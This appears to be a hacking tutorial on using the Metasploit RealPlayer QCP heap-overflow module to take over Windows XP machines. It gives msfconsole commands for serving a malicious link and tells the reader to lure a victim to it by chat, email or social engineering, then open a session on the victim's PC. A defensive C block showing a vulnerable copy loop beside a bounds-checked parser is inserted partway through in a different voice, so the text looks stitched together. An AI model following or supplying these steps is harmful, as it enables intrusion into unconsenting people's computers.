Hack Remote PC with RealNetworks RealPlayer QCP Parsing Heap Overflow Exploit

This module exploits a heap overflow in RealPlayer when handling a .QCP file. The specific flaw exists within qcpfformat.dll. A static 256-byte buffer is allocated on the heap and user-supplied data from the file is copied into it within a memory copy loop, with no check that the chunk length declared in the file fits the buffer. This allows a remote attacker to execute arbitrary code in the context of the web browser via a .QCP file with a specially crafted “fmt” chunk. At this moment this module exploits the flaw on Windows XP with IE6 and IE7.
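To show the bug class the paragraph describes from the defender's side, here is an added example (hypothetical C, not the code of qcpfformat.dll or of the Metasploit module): a trusting chunk-copy loop next to a checked parser that rejects any “fmt” chunk whose declared length exceeds the 256-byte buffer or the bytes actually present. The RIFF/QLCM layout and the sample file are assumptions constructed for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdlib.h>
#define FMT_BUF_SIZE 256  /* size of the fixed heap buffer the page describes */
static uint32_t rd32(const uint8_t *p) { return p[0] | (p[1] << 8) | (p[2] << 16) | ((uint32_t)p[3] << 24); }
static void wr32(uint8_t *p, uint32_t v) { p[0] = v; p[1] = v >> 8; p[2] = v >> 16; p[3] = v >> 24; }
/* Vulnerable pattern (hypothetical reconstruction, not qcpfformat.dll's code): the
 * loop trusts the chunk length read from the file, so a "fmt " chunk longer than
 * 256 bytes writes past the end of the heap buffer. Shown for contrast, never called. */
void copy_fmt_unchecked(uint8_t *dst, const uint8_t *src, uint32_t declared_len) {
    for (uint32_t i = 0; i < declared_len; i++)
        dst[i] = src[i];                          /* never compared to FMT_BUF_SIZE */
}
/* Hardened copy: bytes copied, or -1 when the declared length exceeds either the
 * destination buffer or the bytes actually left in the file. */
static int copy_fmt_checked(uint8_t *dst, size_t dst_len, const uint8_t *src,
                            size_t src_avail, uint32_t declared_len) {
    if (declared_len > dst_len || declared_len > src_avail) return -1;
    memcpy(dst, src, declared_len);
    return (int)declared_len;
}
/* Walk a RIFF/QLCM file, find "fmt " and copy it into a 256-byte heap buffer.
 * Returns the fmt length, or -1 if the chunk is missing, truncated or oversized. */
int parse_qcp_fmt(const uint8_t *file, size_t len) {
    if (len < 12 || memcmp(file, "RIFF", 4) || memcmp(file + 8, "QLCM", 4)) return -1;
    for (size_t off = 12; off + 8 <= len; ) {
        uint32_t csize = rd32(file + off + 4);    /* little-endian chunk size */
        if (memcmp(file + off, "fmt ", 4) == 0) {
            uint8_t *buf = malloc(FMT_BUF_SIZE);
            if (!buf) return -1;
            int n = copy_fmt_checked(buf, FMT_BUF_SIZE, file + off + 8, len - off - 8, csize);
            free(buf); return n;
        }
        if (csize > len - off - 8) return -1;     /* truncated chunk */
        off += 8 + csize + (csize & 1);           /* RIFF chunks are word-aligned */
    }
    return -1;
}
/* Constructed sample: RIFF/QLCM header plus one "fmt " chunk whose header declares
 * `declared` bytes while `actual` payload bytes are present; returns the parse result. */
int sample_result(uint32_t declared, size_t actual) {
    uint8_t f[1024];
    if (actual > sizeof f - 20) return -1;
    memcpy(f, "RIFF", 4); wr32(f + 4, (uint32_t)(12 + actual));
    memcpy(f + 8, "QLCM", 4); memcpy(f + 12, "fmt ", 4); wr32(f + 16, declared);
    memset(f + 20, 0x41, actual);
    return parse_qcp_fmt(f, 20 + actual);
}
```

A file whose “fmt” header claims more than 256 bytes, or more than the file contains, is rejected before any copy happens; the same length check is what the vulnerable loop lacks.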

Exploit Targets

RealPlayer 11.0 – 11.1

RealPlayer SP 1.0 – 1.1.5

RealPlayer 14.0.0 – 14.0.5

Internet Explorer 7.0.5730.13

Apple RealPlayer 14.0.2.633

Requirements

Attacker: Backtrack 5

Victim PC: Windows XP

Open a BackTrack terminal and type msfconsole

Now type use exploit/windows/browser/realplayer_qcp

Msf exploit (realplayer_qcp)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (realplayer_qcp)>set uripath realplayer (The Url to use for this exploit)

Msf exploit (realplayer_qcp)>exploit

The URL to give to your victim is now http://192.168.1.4:8080/realplayer

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” to list sessions and note the session number, then type “sessions -i ID” to connect to it.
